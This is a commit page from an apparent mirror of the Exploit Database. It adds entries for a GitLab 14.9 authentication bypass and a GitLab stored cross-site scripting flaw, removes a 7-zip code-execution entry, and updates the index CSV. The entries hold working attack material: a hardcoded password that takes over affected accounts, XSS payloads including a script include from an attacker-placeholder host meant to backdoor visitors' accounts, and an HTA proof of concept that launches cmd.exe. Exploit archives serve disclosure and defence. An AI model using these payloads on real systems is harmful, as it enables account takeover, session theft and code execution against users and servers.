bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-04-27

Browse source 
4 changes to exploits/shellcodes

7-zip - Code Execution / Local Privilege Escalation
Gitlab 14.9 - Authentication Bypass
GitLab 14.9 - Stored Cross-Site Scripting (XSS)
This commit is contained in:
Offensive Security 2022-04-27 05:01:59 +00:00
parent 6350525c20
commit 004fdfd467
4 changed files with 38 additions and 23 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
exploits/ruby/webapps/50888.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Gitlab 14.9 - Authentication Bypass
# Date: 12/04/2022
# Exploit Authors: Greenwolf & stacksmashing
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install
# Version: GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2
# Tested on: Linux
# CVE : CVE-2022-1162
# References: https://github.com/Greenwolf/CVE-2022-1162
A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts.
Exploit:
New Gitlab Accounts (created since the first affect version and if Gitlab is before the patched version) can be logged into with the following password:
123qweQWE!@#000000000

19
exploits/ruby/webapps/50889.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Gitlab Stored XSS
# Date: 12/04/2022
# Exploit Authors: Greenwolf & stacksmashing
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install
# Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2
# Tested on: Linux
# CVE : CVE-2022-1175
# References: https://github.com/Greenwolf/CVE-2022-1175
Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor.
Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.
<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>
Standard script include also works depending on the sites CSP policy. This is more stealthy.
<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>

22
exploits/windows/local/50883.txt
View file

@ -1,22 +0,0 @@
# Exploit Title: 7-zip - Code Execution / Local Privilege Escalation
# Exploit Author: Kağan Çapar
# Date: 2020-04-12
# Vendor homepage: https://www.7-zip.org/
# Software link: https://www.7-zip.org/a/7z2107-x64.msi
# Version: 21.07 and all versions
# Tested On: Windows 10 Pro (x64)
# References: https://github.com/kagancapar/CVE-2022-29072
# About:
7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.
# Proof of Concept:
<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

3
files_exploits.csv
View file

@ -11479,7 +11479,6 @@ id,file,description,date,author,type,platform,port
50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
50883,exploits/windows/local/50883.txt,"7-zip - Code Execution / Local Privilege Escalation",1970-01-01,"Kağan Çapar",local,windows,
50885,exploits/windows/local/50885.txt,"PTPublisher v2.3.4 - Unquoted Service Path",1970-01-01,bios,local,windows,
50886,exploits/windows/local/50886.txt,"EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path",1970-01-01,bios,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
@ -44953,3 +44952,5 @@ id,file,description,date,author,type,platform,port
50881,exploits/php/webapps/50881.txt,"PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)",1970-01-01,"Hemant Kashyap",webapps,php,
50882,exploits/php/webapps/50882.py,"WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,AkuCyberSec,webapps,php,
50884,exploits/php/webapps/50884.txt,"Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Ali J",webapps,php,
50888,exploits/ruby/webapps/50888.txt,"Gitlab 14.9 - Authentication Bypass",1970-01-01,Greenwolf,webapps,ruby,
50889,exploits/ruby/webapps/50889.txt,"GitLab 14.9 - Stored Cross-Site Scripting (XSS)",1970-01-01,Greenwolf,webapps,ruby,

Can't render this file because it is too large.